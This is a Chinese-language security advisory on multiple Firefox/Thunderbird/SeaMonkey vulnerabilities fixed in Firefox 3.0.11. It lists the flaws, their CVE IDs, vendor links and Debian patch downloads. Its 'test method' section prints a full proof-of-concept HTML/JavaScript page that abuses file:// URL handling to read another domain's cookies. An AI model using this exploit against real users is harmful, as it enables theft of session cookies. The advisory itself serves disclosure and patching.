安全研究

安全漏洞
Firefox 3.0.11版本修复多个安全漏洞

发布日期:2009-06-11
更新日期:2009-06-16

受影响系统:
Mozilla Firefox < 3.0.11
Mozilla Thunderbird < 2.0.0.22
Mozilla SeaMonkey < 1.1.17
不受影响系统:
Mozilla Firefox 3.0.11
Mozilla Thunderbird 2.0.0.22
Mozilla SeaMonkey 1.1.17
描述:
BUGTRAQ  ID: 35360,35370,35373,35371,35372,35377,35380,35383,35386,35388
CVE(CAN) ID: CVE-2009-1392,CVE-2009-1832,CVE-2009-1833,CVE-2009-1834,CVE-2009-1835,CVE-2009-1836,CVE-2009-1837,CVE-2009-1838,CVE-2009-1839,CVE-2009-1840,CVE-2009-1841

Firefox是Mozilla所发布的开源WEB浏览器。

Firefox中的多个安全漏洞允许恶意用户泄露敏感信息、绕过安全限制或入侵用户系统。由于代码共享,Thunderbird和SeaMonkey也受这些漏洞的影响。

1) 如果在加载Java applet时离开了网页,则访问NPObject JS wrapper类对象的保密数据就可能出现竞争条件,导致使用已释放的内存。

2) 浏览器引擎和JavaScript引擎中存在多个内存破坏漏洞。

3) 两次创建帧可能触发内存破坏,导致执行任意代码。

4) Firefox显示IDN中某些Unicode字符的方式存在漏洞。如果IDN包含有无效的字符,会显示为空格,用户会误以为正在访问可信任的站点。

5) 如果用户通过file:// URL加载了恶意的本地内容就可能导致该内容访问其他本地数据。成功利用这个漏洞要求用户下载并打开了特制的HTML文件。

6) 在处理到代理的CONNECT请求后的非200响应时存在错误,如果攻击者能够对使用代理服务器的Firefox例程执行中间人攻击,就可以从用户所访问的站点窃取敏感信息。

7) 在垃圾收集后元素的所有者文档可能为空,事件处理器可以利用这个漏洞以chrome权限执行任意Javascript代码。

8) 在通过地址栏加载file:资源时可能允许访问正常情况下受保护的其他本地文件的内容。

9) Firefox加载XUL脚本的方式存在权限提升漏洞,在没有发生某些策略检查时Firefox和某些附件组件可能加载恶意内容。

10) chrome特权对象(如浏览器侧栏或FeedWriter)与web内容交互的方式存在错误,可能导致以对象的chrome权限执行任意代码。

<*来源:Bob Clary
        Jesse Ruderman (jruderman@gmail.com
        Alexander Sack
        Bret McMillan
        Matt McCutchen
        Martijn Warger
  
  链接:http://secunia.com/advisories/35331/
        http://secunia.com/secunia_research/2009-19/
        http://www.mozilla.org/security/announce/2009/mfsa2009-24.html
        http://www.mozilla.org/security/announce/2009/mfsa2009-25.html
        http://www.mozilla.org/security/announce/2009/mfsa2009-26.html
        http://www.mozilla.org/security/announce/2009/mfsa2009-27.html
        http://www.mozilla.org/security/announce/2009/mfsa2009-28.html
        http://www.mozilla.org/security/announce/2009/mfsa2009-29.html
        http://www.mozilla.org/security/announce/2009/mfsa2009-30.html
        http://www.mozilla.org/security/announce/2009/mfsa2009-31.html
        http://www.mozilla.org/security/announce/2009/mfsa2009-32.html
        https://www.redhat.com/support/errata/RHSA-2009-1096.html
        https://www.redhat.com/support/errata/RHSA-2009-1095.html
        http://www.debian.org/security/2009/dsa-1820
        https://www.redhat.com/support/errata/RHSA-2009-1125.html
        https://www.redhat.com/support/errata/RHSA-2009-1126.html
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

<?xml version="1.0"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<!--
Copyright (c) 2009, Gregory Fleischer (gfleischer@gmail.com)
License: Revised BSD
-->
<head>
<title>read domain cookie</title>
<script type="text/javascript">//<![CDATA[
var div0;
var input0;
var iframe0;
function doit() {

    if (!iframe0) {
    return;
    }

    var loc = location.toString();
    if (loc.match(/^file:\/\/\//)) {
    iframe0.src="";
    var domain = input0.value;
    var target = loc.replace("file:\/\/", "file:\/\/" + domain);
    var doc = iframe0.contentDocument.open();
    doc.write("<html><head><meta http-equiv='Refresh' content='0," +
          target + "'></meta></head></html>");
    doc.close();
    }
}
function init(){

    if ("file:" != location.protocol) {
    alert("must load from local file");
    return;
    }

    var loc = location.toString();
    if (!loc.match(/^file:\/\/\//)) {
    alert("domain=" + document.domain + "\n" + "cookie=" + document.cookie);    
    } else {

    div0 = document.getElementById("div0");
    input0 = document.getElementById("input0");
    if ("" == input0.value) {
        input0.value = "www.google.com";
    }

    div0.style["display"]="";

    iframe0 = document.createElement("iframe");
    iframe0.id = "iframe0";
    iframe0.width=1;
    iframe0.height=1;
    iframe0.style["border"] = "0px";
    document.body.appendChild(iframe0);
    }
}
//]]>
</script>
</head>
<body onload="init()">
    <div id="div0" style="display:none">
      <label for="input0">domain:</label>
      <input type="text" name="input0" id="input0" size="24"/>
      <input type="button" id="input1" value="doit" onclick="doit()"/><br />
    </div>
</body>
</html>
<!-- Keep this comment at the end of the file
Local variables:
mode:xml-html
sgml-declaration:"~/lib/DTD/xhtml1/xhtml1.dcl"
sgml-default-dtd-file:"~/lib/DTD/xhtml1/xhtml1-transitional.ced"
End:
-->

建议:
厂商补丁:

Debian
------
Debian已经为此发布了一个安全公告(DSA-1820-1)以及相应补丁:
DSA-1820-1:New xulrunner packages fix several vulnerabilities
链接:http://www.debian.org/security/2009/dsa-1820

补丁下载:
Source archives:

http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner_1.9.0.11.orig.tar.gz
Size/MD5 checksum: 43878486 54e05857f54ecaaf8c18a8ff8977ede9
http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner_1.9.0.11-0lenny1.diff.gz
Size/MD5 checksum:   116016 9e90e48c64a417b432c07204a0cca3c7
http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner_1.9.0.11-0lenny1.dsc
Size/MD5 checksum:     1784 9da4109122928e729c43e1ad227ef3ee

Architecture independent packages:

http://security.debian.org/pool/updates/main/x/xulrunner/libmozillainterfaces-java_1.9.0.11-0lenny1_all.deb
Size/MD5 checksum:  1481072 a2c38ce502706675d7e19b6cfec10322

alpha architecture (DEC Alpha)

http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs-dev_1.9.0.11-0lenny1_alpha.deb
Size/MD5 checksum:   220876 b9c7195b3e22cb49b804bcdc98a5f29a
http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-gnome-support_1.9.0.11-0lenny1_alpha.deb
Size/MD5 checksum:   111596 d8bf448a074e007530fcbdc2ace286e2
http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d_1.9.0.11-0lenny1_alpha.deb
Size/MD5 checksum:   429342 3100f5645733df46d6ee8a9328d71551
http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-dbg_1.9.0.11-0lenny1_alpha.deb
Size/MD5 checksum: 51057266 d4ff87cf5448643ec1257907b7b08320
http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-dev_1.9.0.11-0lenny1_alpha.deb
Size/MD5 checksum:  3648766 d150d9e0dd5b51c8d7cef73885708f95
http://security.debian.org/pool/updates/main/x/xulrunner/spidermonkey-bin_1.9.0.11-0lenny1_alpha.deb
Size/MD5 checksum:    71262 a468cff5e3a9d9ae2a7ecdafa3ef6aa1
http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d-dbg_1.9.0.11-0lenny1_alpha.deb
Size/MD5 checksum:   933344 433a560fa4008f875d82263f5f27a522
http://security.debian.org/pool/updates/main/x/xulrunner/python-xpcom_1.9.0.11-0lenny1_alpha.deb
Size/MD5 checksum:   163490 0c7a249d86b2d65e132e3a6116fecc31
http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9_1.9.0.11-0lenny1_alpha.deb
Size/MD5 checksum:  9484858 c7fceefe6a70c5077aef044262ffcee3

amd64 architecture (AMD x86_64 (AMD64))

http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d-dbg_1.9.0.11-0lenny1_amd64.deb
Size/MD5 checksum:   885336 0719dd55e918cd43d5f8bb28453d1ee8
http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs-dev_1.9.0.11-0lenny1_amd64.deb
Size/MD5 checksum:   223278 6ce156d2bd8d5cec60c3322bd10277ea
http://security.debian.org/pool/updates/main/x/xulrunner/spidermonkey-bin_1.9.0.11-0lenny1_amd64.deb
Size/MD5 checksum:    69806 5b58470d7a139f1de45d37dd894711fd
http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-dev_1.9.0.11-0lenny1_amd64.deb
Size/MD5 checksum:  3587810 6563cb58d7d914ac16948cd30a981f92
http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d_1.9.0.11-0lenny1_amd64.deb
Size/MD5 checksum:   373314 406f78cdf84f1cbe75a57aee36eaa1d4
http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-gnome-support_1.9.0.11-0lenny1_amd64.deb
Size/MD5 checksum:   101190 417ca47d52a6f0b874dee0473d520f10
http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-dbg_1.9.0.11-0lenny1_amd64.deb
Size/MD5 checksum: 50305324 4a56a34e5287acbf6643a94481e4a53e
http://security.debian.org/pool/updates/main/x/xulrunner/python-xpcom_1.9.0.11-0lenny1_amd64.deb
Size/MD5 checksum:   151070 37a3d7bac733f0fe022a60642204d490
http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9_1.9.0.11-0lenny1_amd64.deb
Size/MD5 checksum:  7733630 1bd17ebcf26b1b69960654134b222367

arm architecture (ARM)

http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d_1.9.0.11-0lenny1_arm.deb
Size/MD5 checksum:   348214 aaf36fcde01af6ab9c8910c74eca24ec
http://security.debian.org/pool/updates/main/x/xulrunner/python-xpcom_1.9.0.11-0lenny1_arm.deb
Size/MD5 checksum:   140298 b0e59d229b23a7ae778d9cd669fee278
http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9_1.9.0.11-0lenny1_arm.deb
Size/MD5 checksum:  6781858 23d3f3b80b854b493df8a5b4b0d74573
http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-dev_1.9.0.11-0lenny1_arm.deb
Size/MD5 checksum:  3577702 8d722a076134736a4d4071c8d54a6c01
http://security.debian.org/pool/updates/main/x/xulrunner/spidermonkey-bin_1.9.0.11-0lenny1_arm.deb
Size/MD5 checksum:    67532 0771c01c13443b2c8c1ad638bc02efa4
http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs-dev_1.9.0.11-0lenny1_arm.deb
Size/MD5 checksum:   221312 c61bafa4cc40e8111b2ecae730ef2512
http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d-dbg_1.9.0.11-0lenny1_arm.deb
Size/MD5 checksum:   813238 9c9019b072ffe9aabe4595de5f61239d
http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-gnome-support_1.9.0.11-0lenny1_arm.deb
Size/MD5 checksum:    83454 39562d358d257270b4a35a0857d39d84
http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-dbg_1.9.0.11-0lenny1_arm.deb
Size/MD5 checksum: 49242060 82a8c186e6243aa8d26177c9ea17f84f

armel architecture (ARM EABI)

http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-dev_1.9.0.11-0lenny1_armel.deb
Size/MD5 checksum:  3577974 10ad8d802b67feac72288b50f8982913
http://security.debian.org/pool/updates/main/x/xulrunner/python-xpcom_1.9.0.11-0lenny1_armel.deb
Size/MD5 checksum:   141760 cb82f05c2a7d0f2bcf59dc312f046861
http://security.debian.org/pool/updates/main/x/xulrunner/spidermonkey-bin_1.9.0.11-0lenny1_armel.deb
Size/MD5 checksum:    69730 b2dee532d05c0d2c142f19291752b6ef
http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-gnome-support_1.9.0.11-0lenny1_armel.deb
Size/MD5 checksum:    84048 c27d4e1db5d11e1c0cc5b52154d8ccf3
http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d-dbg_1.9.0.11-0lenny1_armel.deb
Size/MD5 checksum:   819430 f0dd69de275b66c8ac477dcc35c53f7f
http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9_1.9.0.11-0lenny1_armel.deb
Size/MD5 checksum:  6945398 623a2422199fecf2b0789be43b45a1e1
http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d_1.9.0.11-0lenny1_armel.deb
Size/MD5 checksum:   350732 9e8b7c5f70580b9c83de8388bb3c8282
http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs-dev_1.9.0.11-0lenny1_armel.deb
Size/MD5 checksum:   222338 d0b32bbf4683bed84f47e64b882e2803
http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-dbg_1.9.0.11-0lenny1_armel.deb
Size/MD5 checksum: 50082962 9441b288c89302e95521eeb771033e76

hppa architecture (HP PA RISC)

http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d_1.9.0.11-0lenny1_hppa.deb
Size/MD5 checksum:   409254 cdaf90024b3ee42d93e4b47396c4e2c8
http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-dev_1.9.0.11-0lenny1_hppa.deb
Size/MD5 checksum:  3619220 486dcd3039366608220bde599536fd3f
http://security.debian.org/pool/updates/main/x/xulrunner/python-xpcom_1.9.0.11-0lenny1_hppa.deb
Size/MD5 checksum:   158366 edbfe8b6a65138e17a6749f1f9f74f6e
http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d-dbg_1.9.0.11-0lenny1_hppa.deb
Size/MD5 checksum:   896076 4e7bf4b3b346406b242799492d7c52d7
http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9_1.9.0.11-0lenny1_hppa.deb
Size/MD5 checksum:  9498572 ac01a178199d355ca14acfbe694dd5ff
http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-gnome-support_1.9.0.11-0lenny1_hppa.deb
Size/MD5 checksum:   105466 16dde9161789bfa5ecdff4b33699ba0b
http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-dbg_1.9.0.11-0lenny1_hppa.deb
Size/MD5 checksum: 51178368 ab80ce0bfcad0c4ba7f6a8e1696f18c1
http://security.debian.org/pool/updates/main/x/xulrunner/spidermonkey-bin_1.9.0.11-0lenny1_hppa.deb
Size/MD5 checksum:    70546 480722ae9b031c03e1b160b5d3d9c8b0
http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs-dev_1.9.0.11-0lenny1_hppa.deb
Size/MD5 checksum:   222064 2ab947cf77e78386a2b6026a1d04ce67

i386 architecture (Intel ia32)

http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-dev_1.9.0.11-0lenny1_i386.deb
Size/MD5 checksum:  3562742 14cd4e8f8a92e112f9bdc70785b2c366
http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9_1.9.0.11-0lenny1_i386.deb
Size/MD5 checksum:  6592362 7cda737dd6f323028419ae3335c1f735
http://security.debian.org/pool/updates/main/x/xulrunner/python-xpcom_1.9.0.11-0lenny1_i386.deb
Size/MD5 checksum:   140928 bca0b8180b6154e0614fbbba62b723d2
http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d-dbg_1.9.0.11-0lenny1_i386.deb
Size/MD5 checksum:   849710 51452041e9c71287ef7cc84efd6e9075
http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-gnome-support_1.9.0.11-0lenny1_i386.deb
Size/MD5 checksum:    78724 d4cb9e6cdc3ed15a5f8ee090641f7077
http://security.debian.org/pool/updates/main/x/xulrunner/spidermonkey-bin_1.9.0.11-0lenny1_i386.deb
Size/MD5 checksum:    67420 3496ca0c0579daa3071699492cee80f2
http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-dbg_1.9.0.11-0lenny1_i386.deb
Size/MD5 checksum: 49453720 d066dfc3d56bf77cd6e819bebc92530b
http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs-dev_1.9.0.11-0lenny1_i386.deb
Size/MD5 checksum:   222484 7f7935702977c7873521e24655c83224
http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d_1.9.0.11-0lenny1_i386.deb
Size/MD5 checksum:   348428 aa075e8a873ba8794dead19b05dbfeef

ia64 architecture (Intel ia64)

http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-dbg_1.9.0.11-0lenny1_ia64.deb
Size/MD5 checksum: 49623688 6afd6469c2c80b0d3d973d8a50d31e8b
http://security.debian.org/pool/updates/main/x/xulrunner/python-xpcom_1.9.0.11-0lenny1_ia64.deb
Size/MD5 checksum:   179684 f7d0307dffc0aaad7cff3e78e92cd41c
http://security.debian.org/pool/updates/main/x/xulrunner/spidermonkey-bin_1.9.0.11-0lenny1_ia64.deb
Size/MD5 checksum:    75646 b88ac5a740b258d93f2a19850751aa13
http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-dev_1.9.0.11-0lenny1_ia64.deb
Size/MD5 checksum:  3393510 d6bfd74513c42b56100c9593ad0f95e8
http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-gnome-support_1.9.0.11-0lenny1_ia64.deb
Size/MD5 checksum:   121130 7687535ccc491bddd3f73f840e7e20e1
http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs-dev_1.9.0.11-0lenny1_ia64.deb
Size/MD5 checksum:   222480 b784a7c95fcaf07b6da14317c4b0c069
http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d_1.9.0.11-0lenny1_ia64.deb
Size/MD5 checksum:   539108 d20da7adc0bf340bf9fd809569be6579
http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d-dbg_1.9.0.11-0lenny1_ia64.deb
Size/MD5 checksum:   809520 51774edfca03bc47a3f3d68923fcec60
http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9_1.9.0.11-0lenny1_ia64.deb
Size/MD5 checksum: 11286510 dcac7e53599a26f69dd54a76de139842

mips architecture (MIPS (Big Endian))

http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-dbg_1.9.0.11-0lenny1_mips.deb
Size/MD5 checksum: 51812570 d3d0183f3132a16f446bcdd78ab75967
http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-dev_1.9.0.11-0lenny1_mips.deb
Size/MD5 checksum:  3610174 4c156e4001e6016d937dd0b76ed580dc
http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d-dbg_1.9.0.11-0lenny1_mips.deb
Size/MD5 checksum:   915412 c1bfe8ad7c499582ef8c977ccef65f27
http://security.debian.org/pool/updates/main/x/xulrunner/python-xpcom_1.9.0.11-0lenny1_mips.deb
Size/MD5 checksum:   144332 77ee78102394d802e258082f7addbcbe
http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-gnome-support_1.9.0.11-0lenny1_mips.deb
Size/MD5 checksum:    96722 56777daacaa360b84b4e3aa05edecd71
http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs-dev_1.9.0.11-0lenny1_mips.deb
Size/MD5 checksum:   222244 fbdd53f3ff72b6a29c8ce39cc3cfe10f
http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9_1.9.0.11-0lenny1_mips.deb
Size/MD5 checksum:  7658916 408c0db56ae40697122fd88f50193934
http://security.debian.org/pool/updates/main/x/xulrunner/spidermonkey-bin_1.9.0.11-0lenny1_mips.deb
Size/MD5 checksum:    69514 d0e2e575d784499420754c8abd9af50a
http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d_1.9.0.11-0lenny1_mips.deb
Size/MD5 checksum:   377778 a5ab1e24584957a6cb1cb666457c0a89

mipsel architecture (MIPS (Little Endian))

http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d-dbg_1.9.0.11-0lenny1_mipsel.deb
Size/MD5 checksum:   897114 87ae9cba0faeb97a2687345e87adf392
http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-dbg_1.9.0.11-0lenny1_mipsel.deb
Size/MD5 checksum: 49926646 89fa718bb331b75385eeae8c9801a67c
http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs-dev_1.9.0.11-0lenny1_mipsel.deb
Size/MD5 checksum:   222480 dbc4aa1edc02a0ec874f0bfaebfbdee8
http://security.debian.org/pool/updates/main/x/xulrunner/spidermonkey-bin_1.9.0.11-0lenny1_mipsel.deb
Size/MD5 checksum:    69156 0ad7389bc3f06f24e767737fbc52e9fc
http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9_1.9.0.11-0lenny1_mipsel.deb
Size/MD5 checksum:  7368776 93e78ea1a6712faab89a33c1e4dfaab6
http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-dev_1.9.0.11-0lenny1_mipsel.deb
Size/MD5 checksum:  3304946 aa29a73dcd93f7fc4dfec2265f75490d
http://security.debian.org/pool/updates/main/x/xulrunner/python-xpcom_1.9.0.11-0lenny1_mipsel.deb
Size/MD5 checksum:   144620 9b45d1a05b6f6fb36785ecc078718da5
http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-gnome-support_1.9.0.11-0lenny1_mipsel.deb
Size/MD5 checksum:    96374 b9f28757e4af8d8de9c625e33127b371
http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d_1.9.0.11-0lenny1_mipsel.deb
Size/MD5 checksum:   375560 c8896414f96b935e06e84183dcfdbe59

powerpc architecture (PowerPC)

http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-dev_1.9.0.11-0lenny1_powerpc.deb
Size/MD5 checksum:  3577026 01717cbc10caefb1b0b01c0b5fd1f94d
http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9_1.9.0.11-0lenny1_powerpc.deb
Size/MD5 checksum:  7283612 316443439ef6ae959a35ea9f9f448f72
http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d_1.9.0.11-0lenny1_powerpc.deb
Size/MD5 checksum:   360002 b54823b9a6c42cc9e2fc96d20340b503
http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs-dev_1.9.0.11-0lenny1_powerpc.deb
Size/MD5 checksum:   222826 92df5e4ac3c9c4c37d7569c768b2f888
http://security.debian.org/pool/updates/main/x/xulrunner/spidermonkey-bin_1.9.0.11-0lenny1_powerpc.deb
Size/MD5 checksum:    72594 9c0f3abc92447af9b2729145f4665270
http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d-dbg_1.9.0.11-0lenny1_powerpc.deb
Size/MD5 checksum:   886178 6e0c34af00e47444c57dbdd74d7615bd
http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-dbg_1.9.0.11-0lenny1_powerpc.deb
Size/MD5 checksum: 51355158 973470eacfa59e590390e02bbd594865
http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-gnome-support_1.9.0.11-0lenny1_powerpc.deb
Size/MD5 checksum:    94292 8c5db950d96fc61804236569673d357e
http://security.debian.org/pool/updates/main/x/xulrunner/python-xpcom_1.9.0.11-0lenny1_powerpc.deb
Size/MD5 checksum:   152542 6c9e947aea31a946e2716d9b55638d9e

s390 architecture (IBM S/390)

http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-dev_1.9.0.11-0lenny1_s390.deb
Size/MD5 checksum:  3302788 dee47f233c50057abf09e5711f4f81f6
http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs-dev_1.9.0.11-0lenny1_s390.deb
Size/MD5 checksum:   222476 ebbc066f3849e6f76b4312220de0e541
http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-dbg_1.9.0.11-0lenny1_s390.deb
Size/MD5 checksum: 51133352 668c4d6a8e1d07300f8c2dc167ed2565
http://security.debian.org/pool/updates/main/x/xulrunner/spidermonkey-bin_1.9.0.11-0lenny1_s390.deb
Size/MD5 checksum:    72146 daa378828aa27c1bdb2bc156a44b6bd1
http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d_1.9.0.11-0lenny1_s390.deb
Size/MD5 checksum:   404426 d74cb3f836b87095737383827f830f93
http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-gnome-support_1.9.0.11-0lenny1_s390.deb
Size/MD5 checksum:   105168 c9466fe1af7b4c52768a29d5a689f85e
http://security.debian.org/pool/updates/main/x/xulrunner/python-xpcom_1.9.0.11-0lenny1_s390.deb
Size/MD5 checksum:   155676 7aee79fa600cdbeb1331ab39afe4c58f
http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d-dbg_1.9.0.11-0lenny1_s390.deb
Size/MD5 checksum:   906764 d27506e74851bbbb7981906a82a9979a
http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9_1.9.0.11-0lenny1_s390.deb
Size/MD5 checksum:  8378072 b7a585304a0c7d6960d42837ecae5850

sparc architecture (Sun SPARC/UltraSPARC)

http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-dbg_1.9.0.11-0lenny1_sparc.deb
Size/MD5 checksum: 49318092 524a8852efe2065eba2903375f331bd2
http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9_1.9.0.11-0lenny1_sparc.deb
Size/MD5 checksum:  7159518 abb575798284a03076b980b581b05408
http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d_1.9.0.11-0lenny1_sparc.deb
Size/MD5 checksum:   346694 d1f904bb74f77b8a5336ca36d3e893fb
http://security.debian.org/pool/updates/main/x/xulrunner/python-xpcom_1.9.0.11-0lenny1_sparc.deb
Size/MD5 checksum:   141522 418022086d352f0be7ed5f578cf791dc
http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-gnome-support_1.9.0.11-0lenny1_sparc.deb
Size/MD5 checksum:    87158 9b2c0c57e26431ba5f811e1bd871019d
http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-dev_1.9.0.11-0lenny1_sparc.deb
Size/MD5 checksum:  3573726 b49ea475fc28bc37b32c03ea6c89f6ec
http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d-dbg_1.9.0.11-0lenny1_sparc.deb
Size/MD5 checksum:   818434 5a0e97b8225bf527094d7bfb1452753a
http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs-dev_1.9.0.11-0lenny1_sparc.deb
Size/MD5 checksum:   221162 87d61c492ba05a96c67832a1df421bf1
http://security.debian.org/pool/updates/main/x/xulrunner/spidermonkey-bin_1.9.0.11-0lenny1_sparc.deb
Size/MD5 checksum:    68500 cd24b46bdd1061b1de29b6ed8df7ce2f

补丁安装方法:

1. 手工安装补丁包:

  首先,使用下面的命令来下载补丁软件:
  # wget url  (url是补丁下载链接地址)

  然后,使用下面的命令来安装补丁:  
  # dpkg -i file.deb (file是相应的补丁名)

2. 使用apt-get自动安装补丁包:

   首先,使用下面的命令更新内部数据库:
   # apt-get update
  
   然后,使用下面的命令安装更新软件包:
   # apt-get upgrade

Mozilla
-------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://www.mozilla.org/

RedHat
------
RedHat已经为此发布了一个安全公告(RHSA-2009:1126-01)以及相应补丁:
RHSA-2009:1126-01:Moderate: thunderbird security update
链接:https://www.redhat.com/support/errata/RHSA-2009-1126.html

浏览次数:3523
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障
关于我们
公司介绍
公司荣誉
公司新闻
联系我们
公司总部
分支机构
海外机构
快速链接
绿盟云
绿盟威胁情报中心NTI
技术博客